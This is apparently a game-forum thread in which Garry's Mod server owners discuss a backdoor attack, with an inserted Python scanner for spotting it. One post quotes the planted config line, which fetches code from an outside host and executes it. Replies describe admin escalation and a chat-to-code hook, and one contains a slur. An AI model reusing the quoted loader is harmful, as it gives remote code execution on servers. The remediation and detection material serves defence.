• Server getting hacked (causing me to have to restart it)
    14 replies, posted
Basically there's this "Lizard Squad" thing that has happened on my DarkRP server twice now, a friend recorded it - [url]https://www.youtube.com/watch?v=-exSbQsZy80[/url] I have no idea what's causing it or how to stop it, but I have to restart the entire server to stop it, so everyone loses whatever they've made/bought, and we lose players due to that.
By chance you wouldn't happen to have that drugs mod from the workshop would you? Because that's got a backdoor in it, and if you do, remove it now.
Nah we don't, removed it somewhat recently
Someone may have left a backdoor in your server after the drugs mod fiasco.
[QUOTE=aultraman123;50458240]Basically there's this "Lizard Squad" thing that has happened on my DarkRP server twice now, a friend recorded it - [url]https://www.youtube.com/watch?v=-exSbQsZy80[/url] I have no idea what's causing it or how to stop it, but I have to restart the entire server to stop it, so everyone loses whatever they've made/bought, and we lose players due to that.[/QUOTE] It could be an E2 if you have wire installed?
[QUOTE=Bings;50458818]It could be an E2 if you have wire installed?[/QUOTE] E2 wouldn't be able to do what the video shows. (not unless all the content, pics and audio is on the server and it's using holo I guess but still unlikely) Sounds like a backdoor and someone running lua
Oh yea, this happened to us too. [IMG]http://i.imgur.com/kJt12A9.jpg/[/IMG] Make sure to remove the code he put in your ULX Config [CODE]lua_run timer.Simple(30, function() http.Fetch("https/xn--vxao.pw/tracker.php?port=" .. GetConVar("hostport"):GetString() .. "&ip=" .. game:GetIPAddress() .. "&addon=" .. GetHostName():Replace(" ", "%20"), function(body) RunString(body, "lua/init.lua") end, function() end) end)[/CODE] Also if your server isn't starting it's because he set kickAfterNameChanges or kickAfterNameChangesWarning to something wonky which is in the config file also. I forget since I deleted most logs of all of this happening at 4 AM, my thought process was to quickly attempt to fix it and then see if he would be able to reproduce it. I also emptied out all of my data folders that weren't needed since the server kept unbanning his IP and SteamID every tick, seems to be solved now. I don't know how he did it to be honest. The nice thing is, he didn't entirely fuck the server since it seems he was only in it to play around which is fine by me. I don't run too many workshop addons and the ones I use are mostly just models or basic sweps so I don't think the exploit happened there. When I finally got around to checking the damage (it was 4 AM and I was asleep), he added himself to superadmin and then added a playersay hook through FAdmin's rcon that would compile anything he said in chat. Then he made himself immune to being banned by ulx and set CAC's MoveHandler to nil and made everyone into massive chairs. Fun times, fun times. I did a few things here and there but I'm pretty sure he can walk around the security checks I added, I will be looking into more security holes throughout the day. If you're a server owner and you're reading this, I would watch out for when this guy joins your server. [URL="https://steamcommunity.com/id/notnotbanksy"]https://steamcommunity.com/id/notnotbanksy[/URL]
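For server owners checking their own files for the kind of line quoted in the post above, a small scanner as an added example (not code from any poster in this thread, and not part of ULX or Garry's Mod). The indicator names, the file extensions scanned and the placeholder host in the sample are assumptions made for illustration.

```python
import os
import re

# Indicators drawn from the config line quoted in the post above.
INDICATORS = {
    "lua_run": re.compile(r"\blua_run(_cl)?\b", re.I),
    "remote_fetch": re.compile(r"\bhttp\.(Fetch|Post)\b|\bHTTP\s*\("),
    "compile_string": re.compile(r"\b(RunString(Ex)?|CompileString)\s*\("),
    "punycode_host": re.compile(r"\bxn--[a-z0-9-]+\.[a-z]{2,}", re.I),
}

def indicators_in(line):
    """Names of the indicators that match one line."""
    return [name for name, rx in INDICATORS.items() if rx.search(line)]

def scan_text(source, text):
    """Return (source, line number, severity, indicators) per flagged line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = indicators_in(line)
        if not hits:
            continue
        # Fetching a URL and compiling the response on one line is a remote loader.
        loader = "remote_fetch" in hits and "compile_string" in hits
        findings.append((source, lineno, "high" if loader else "review", hits))
    return findings

def scan_tree(root, extensions=(".txt", ".cfg", ".lua")):
    """Scan every config, data and Lua file under root (assumed extensions)."""
    findings = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(extensions):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings += scan_text(path, fh.read())
    return findings

# Constructed sample of a ULX-style config; the host is a placeholder.
SAMPLE_CONFIG = '''ulx logEcho 1
ulx kickAfterNameChanges 0
lua_run timer.Simple(30, function() http.Fetch("https://xn--example.invalid/t.php", function(b) RunString(b, "lua/init.lua") end) end)
lua_run print("server started")
'''

if __name__ == "__main__":
    for finding in scan_text("sample-config", SAMPLE_CONFIG):
        print(finding)
```

Point `scan_tree` at the server's `garrysmod` directory; a "review" hit is any `lua_run` in a stored config, which may be legitimate but is worth reading by hand.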
Looks like he's using the code I posted in this thread ages ago. [url]https://facepunch.com/showthread.php?t=1482008[/url]
[QUOTE=dence47;50459959]snip[/QUOTE] Banksy also found the Prometheus 'backdoor' shell that you should remove [sp]That he used to do that[/sp]
If you have Prometheus and updated it to 1.6.3.9 in the last 24 hours then check your packages' custom actions and remove any suspicious ones, also make sure to disable the package from anyone who bought it in the last 24 hours. Check your Prometheus folder for buystats.php and delete it. Then make sure nobody who isn't supposed to have admin on Prometheus has it. Someone breached the update system yesterday and added a malicious file to it. The issue has now been resolved and only people who updated to 1.6.3.9 (even though this update is several weeks old..) in the last 24 hours were affected.
[QUOTE=dence47;50459959]Oh yea, this happened to us too. [IMG]http://i.imgur.com/kJt12A9.jpg/[/IMG] -snip- [/QUOTE] You should change your passwords, specifically the ones that start with O and end with 47, you should use a password manager like LastPass or just use randomly generated passwords for everything, and don't have your MySQL password as a password you use for your own accounts either, especially when it's sitting around in a plaintext file on your web server. Anyone else affected by what I was doing should also be changing their MySQL passwords.
Not "Orangejuice47" that's like, the strongest password ever!
[QUOTE=Banksy.;50461919]You should change your passwords, specifically the ones that start with O and end with 47, you should use a password manager like LastPass or just use randomly generated passwords for everything, and don't have your MySQL password as a password you use for your own accounts either, especially when it's sitting around in a plaintext file on your web server. Anyone else affected by what I was doing should also be changing their MySQL passwords.[/QUOTE] Thank you for the information. I will work on this now.
Is Lizard Squad actually capable of hacking or do they just borrow other people's stuff? I've actually helped a Lizard Squad "member" setup his darkrp server and when I said they were a bunch of fags he threatened me. I laughed and told him if he sassed me I'd fuck up his leaked Prometheus install.
[QUOTE=YourStalker;50467852]Is Lizard Squad actually capable of hacking or do they just borrow other people's stuff? I've actually helped a Lizard Squad "member" setup his darkrp server and when I said they were a bunch of fags he threatened me. I laughed and told him if he sassed me I'd fuck up his leaked Prometheus install.[/QUOTE] The whole lizard squad thing was a joke, whoever believes it honestly needs to get some common sense, especially if they believe the fact that they would be sitting around playing garry's mod.